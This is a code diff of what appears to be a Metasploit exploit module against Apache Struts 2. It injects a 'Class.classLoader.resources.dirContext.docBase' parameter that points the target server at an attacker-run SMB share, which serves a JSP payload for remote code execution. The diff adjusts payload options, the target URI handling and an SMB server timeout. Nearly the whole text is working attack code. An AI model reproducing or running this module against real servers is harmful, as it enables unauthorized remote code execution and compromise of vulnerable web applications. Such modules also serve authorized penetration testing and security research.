@@ -29,30 +29,31 @@ def initialize(info={})
29
29
] ,
30
30
'DefaultOptions' =>
31
31
{
32
- 'EXITFUNC' => 'process' ,
33
- 'DisablePayloadHandler' => 'false' ,
32
+ 'EXITFUNC' => 'process'
33
+ } ,
34
+ 'Payload' =>
35
+ {
36
+ 'Space' => 2048 ,
37
+ 'DisableNops' => true
34
38
} ,
35
39
'Privileged' => true ,
36
40
'Arch' => ARCH_JAVA ,
37
- 'Platform' => [ 'win' ] ,
41
+ 'Platform' => 'win' ,
42
+ 'Stance' => Msf ::Exploit ::Stance ::Aggressive ,
38
43
'Targets' =>
39
- [
40
- [ 'Java Universal' ,
41
- {
42
- 'Arch' => ARCH_JAVA ,
43
- 'Platform' => [ 'win' , 'linux' ]
44
- } ,
45
- ]
46
- ] ,
44
+ [
45
+ [ 'Java Universal' , { } ]
46
+ ] ,
47
47
'DefaultTarget' => 0 ,
48
48
) )
49
49
50
50
register_options (
51
51
[
52
- OptString . new ( 'URI ' , [ true , 'Path to vulnerable Struts action file' , '/struts2-blank/example/HelloWorld.action' , true ] ) ,
52
+ OptString . new ( 'TARGETURI ' , [ true , 'Path to vulnerable Struts action file' , '/struts2-blank/example/HelloWorld.action' ] ) ,
53
53
OptString . new ( 'FILE_NAME' , [ true , 'A static JSP name' , 'HelloWorld.jsp' ] ) ,
54
54
OptString . new ( 'FOLDER_NAME' , [ true , 'A static Folder' , 'example' ] ) ,
55
55
OptString . new ( 'SHARE' , [ true , 'Share' , 'share' ] ) ,
56
+ OptInt . new ( 'SMB_DELAY' , [ true , 'Time that the SMB Server will wait for the payload request' , 10 ] ) ,
56
57
Opt ::RPORT ( 8080 )
57
58
] , self . class )
58
59
@@ -73,26 +74,23 @@ def check
73
74
def primer
74
75
self . file_contents = payload . encoded
75
76
print_status ( "File available on #{ unc } ..." )
76
- share = "#{ unc } "
77
- sploit = datastore [ 'URI' ]
78
- share = share . gsub ( /\\ / , '/' )
79
- #sploit << '?class.classLoader.resources.dirContext.docBase='
77
+
78
+ sploit = target_uri . to_s
80
79
sploit << '?Class.classLoader.resources.dirContext.docBase='
81
- #sploit << '?Class.classLoader.resources.context.effectiveMajorVersion='
82
- #sploit << "?class['classLoader']['resources']['dirContext']['docBase']="
83
- sploit << share
80
+ sploit << "\\ \\ #{ srvhost } \\ #{ share } "
84
81
print_status ( "Injecting JSP to #{ datastore [ 'RHOST' ] } :#{ datastore [ 'RPORT' ] } - #{ sploit } " )
85
82
86
- res = send_request_raw ( {
83
+ send_request_raw ( {
87
84
'method' => 'GET' ,
88
85
'uri' => sploit
89
86
} , 30 )
87
+ end
90
88
91
- # Wait 30 seconds for session to be created
92
- 1 . upto ( 30 ) do
93
- break if session_created?
94
- sleep ( 1 )
89
+ def exploit
90
+ begin
91
+ Timeout . timeout ( datastore [ 'SMB_DELAY' ] ) { super }
92
+ rescue Timeout ::Error
93
+ # do nothing... just finish exploit and stop smb server...
95
94
end
96
- disconnect
97
95
end
98
96
end
0 commit comments